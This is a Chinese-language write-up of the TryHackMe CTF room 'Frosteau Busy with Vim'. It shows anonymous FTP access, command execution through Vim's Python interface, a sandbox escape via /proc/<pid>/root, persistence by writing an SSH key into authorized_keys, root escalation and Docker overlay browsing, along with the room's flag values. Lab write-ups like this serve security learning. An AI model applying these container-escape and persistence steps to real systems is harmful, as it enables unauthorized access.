tryhackme靶场之Frosteau Busy with Vim wp
这个靶场质量不错
扫端口
分析
8085连接进去是一个vim,很有意思
尝试:!whoami
提示
[No write since last change]
Cannot execute shell /tmp/sh可能用户的sh被改了运行不了命令? 试试读取/etc/passwd
:e /etc/passwd
root:x:0:0:root:/root:/usr/busybox/sh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
ubuntu:x:1000:1000::/home/ubuntu:/tmp/sh"/etc/shadow" [Permission Denied]
测试发现似乎可以利用python
:py3 import os;os.system("ls") 没有回显,但是print能正常用
猜测是sh不在/bin/sh导致调用无效
:py3 import os; print(os.listdir("/bin"))
果然,输出是[]
很有意思,/usr/bin也是空的
不知不觉一个小时过去了,没啥思路
去看看其他端口 8095进去似乎是一个nano
8065进去就直接断开
但是提示Ubuntu 22.04.3 LTS
ftp端口似乎需要账号密码
用户(10.10.139.102:(none)):
331 Please specify password
密码:
530 Login failed
登录失败。试试anonymous用户
成功了竟然
ftp> ls
200 Operation successful
150 Directory listing
FROST-2247-SP.txt
YETI-1125-SP.txt
flag-1-of-4.txt
flag-2-of-4.sh
frostling_base.png
frostling_five.png
yeti_footage.png
yeti_mugshot.png
226 Operation successful
ftp: 收到 149 字节,用时 0.01秒 21.29千字节/秒。
ftp> ls
200 Operation successful
150 Directory listing
FROST-2247-SP.txt
YETI-1125-SP.txt
flag-1-of-4.txt
flag-2-of-4.sh
frostling_base.png
frostling_five.png
yeti_footage.png
yeti_mugshot.png
226 Operation successful想着用filezilla的,结果不知道为啥不行。。算了,就用cli吧
获取第一个flag
THM{Let.the.game.begin}
flag2提示是echo $FLAG2
还记得之前vim可以运行python吗? 直接
:py3 import os; print(os.environ.get('FLAG2'))
THM{Seems.like.we.are.getting.busy}
继续,还是熟悉的vim
用:Ex获得一个交互式文件浏览器
发现nano和vim都是在/tmp目录,ftp文件夹在/tmp/ftp目录 试试将nano替换成bash,提示权限不足
而且直接上传bash还需要离线编译一个,有点麻烦
然后:set shell=/path/to/bash
但是似乎不行,不清楚是不是版本问题
目前看情况我们似乎运行在一个沙盒里面
看看有没有办法获取到一个能用的bash
:py3 import os; [print(i) for i in range(1, 9999) if os.path.exists(f"/proc/{i}/root/usr/bin/bash")]返回了很多个,随便找一个
:set shell=/proc/1393/root/usr/bin/bash:!id
/proc/1392/root/usr/bin/bash: id: command not found
shell returned 127额还是不行
但是似乎shell是有的,只是有点问题、
定义一下PATH应该就行了
:!PATH=/proc/1393/root/usr/bin:$PATH id
成功
uid=1000 gid=1000(ubuntu) groups=1000(ubuntu)
终于能弹shell了
但是当前uid是乌班图用户的1000,所以shell用起来应该有点问题
而且也没有root权限,有点难受
话说能不能把ssh密钥写进去? 都能通过proc绕沙盒了,这个应该也行的才对
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCeQIVs/yB0/QinBBirIM+Xr2DTfdM5WxXAEbVjbMWz+VGFMZtGKO+psxxKuOjRgkkPaBC/6RyUdWsRlm4u4M0XZ6jtWVfLfnAMvkSgjPAS8y5WSmCD61niZCSRspMObPvMaKPrRqKj9Py+NgBH8Akuk5oZXcI2ffHVl6HeyUoYCVRKR13lgcYTIPYxIHJLbThdJCr3XWwhTp4BYSFrfKWA6zZZIJbLV4r1RErDYufKt6304UNM4SXH7WOJU6/1BLtzL4vpmR1MfxjdTK3zFpc0/uL8X0n9adfbzNbzruV0U/f45D5CRZT1wS3naGqnETFxuwcyWrn9D8ugEJSmEjy4uzfBP4bmUXC9sBoYjwnXqRankOFykiesKqxAzH9DYF5EmuVcuG/CSsJRe2GmrLSYhVgQ7i8V9mhGUMIOHjAPK9+w74qK19yxYgXkVHoJfTvMCtDJUfGdVhZImRH6+2p1enwNwpIi2M/msiPMbkwzNnC4c1oDz8Ky1Z/QRHVHGtk= [email protected]' > /proc/1393/root/home/ubuntu/.ssh/authorized_keysubuntu@tryhackme:~$ sudo su
root@tryhackme:/home/ubuntu# 很好提权成功
找找另外的flag
root@tryhackme:~# cat flag-4-of-4.txt
THM{Frosteau.would.be.both.proud.and.disappointed}
root@tryhackme:~# cat yetikey3.txt
3-d2dc6a02db03401177f0511a6c99007e945d9cb9b96b8c6294f8c5a2c8e01f60原来如此,原来我们一直在一个docker里面,所以我们相当于是docker逃逸了
root@tryhackme:~# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
3dfd50383e77 busy_busy_box "/etc/bootstrap.sh -d" 3 hours ago Up 3 hours 0.0.0.0:20-21->20-21/tcp, :::20-21->20-21/tcp, 0.0.0.0:8065->8065/tcp, :::8065->8065/tcp, 0.0.0.0:8075->8075/tcp, :::8075->8075/tcp, 0.0.0.0:8085->8085/tcp, :::8085->8085/tcp, 0.0.0.0:8095->8095/tcp, :::8095->8095/tcp, 0.0.0.0:65500-65515->65500-65515/tcp, :::65500-65515->65500-65515/tcp containers_busy_1那么第三个flag可能在docker里面?
root@tryhackme:~# docker exec -it 3dfd50383e77 /bin/sh OCI runtime exec failed: exec failed: unable to start container process: exec: "/bin/sh": stat /bin/sh: no such file or directory: unknown哦,忘记里面shell被破坏了
root@tryhackme:~# docker inspect 3dfd50383e77 | grep "MergedDir"
"MergedDir": "/var/lib/docker/overlay2/1c9f867cb5ba4581dcc22c6cfba30a011bdf1fa4f3043c74a0bbe33d46f9664b/merged",
root@tryhackme:~# cd /var/lib/docker/overlay2/1c9f867cb5ba4581dcc22c6cfba30a011bdf1fa4f3043c74a0bbe33d46f9664b/merged
root@tryhackme:/var/lib/docker/overlay2/1c9f867cb5ba4581dcc22c6cfba30a011bdf1fa4f3043c74a0bbe33d46f9664b/merged# ls
bin dev home lib32 libx32 mnt proc run srv tmp var
boot etc lib lib64 media opt root sbin sys usr
root@tryhackme:/var/lib/docker/overlay2/1c9f867cb5ba4581dcc22c6cfba30a011bdf1fa4f3043c74a0bbe33d46f9664b/merged# cd root
root@tryhackme:/var/lib/docker/overlay2/1c9f867cb5ba4581dcc22c6cfba30a011bdf1fa4f3043c74a0bbe33d46f9664b/merged/root# ls
flag-3-of-4.txt
root@tryhackme:/var/lib/docker/overlay2/1c9f867cb5ba4581dcc22c6cfba30a011bdf1fa4f3043c74a0bbe33d46f9664b/merged/root# cat flag-3-of-4.txt
THM{Not.all.roots.and.routes.are.equal}终于在里面找到了flag3
至此,整个靶场的渗透结束,一共花了有三个小时
主要是获取shell那里花了很久
这次的这个靶场质量还是不错的,学到了不少玩法,明年可以当新生赛题目(x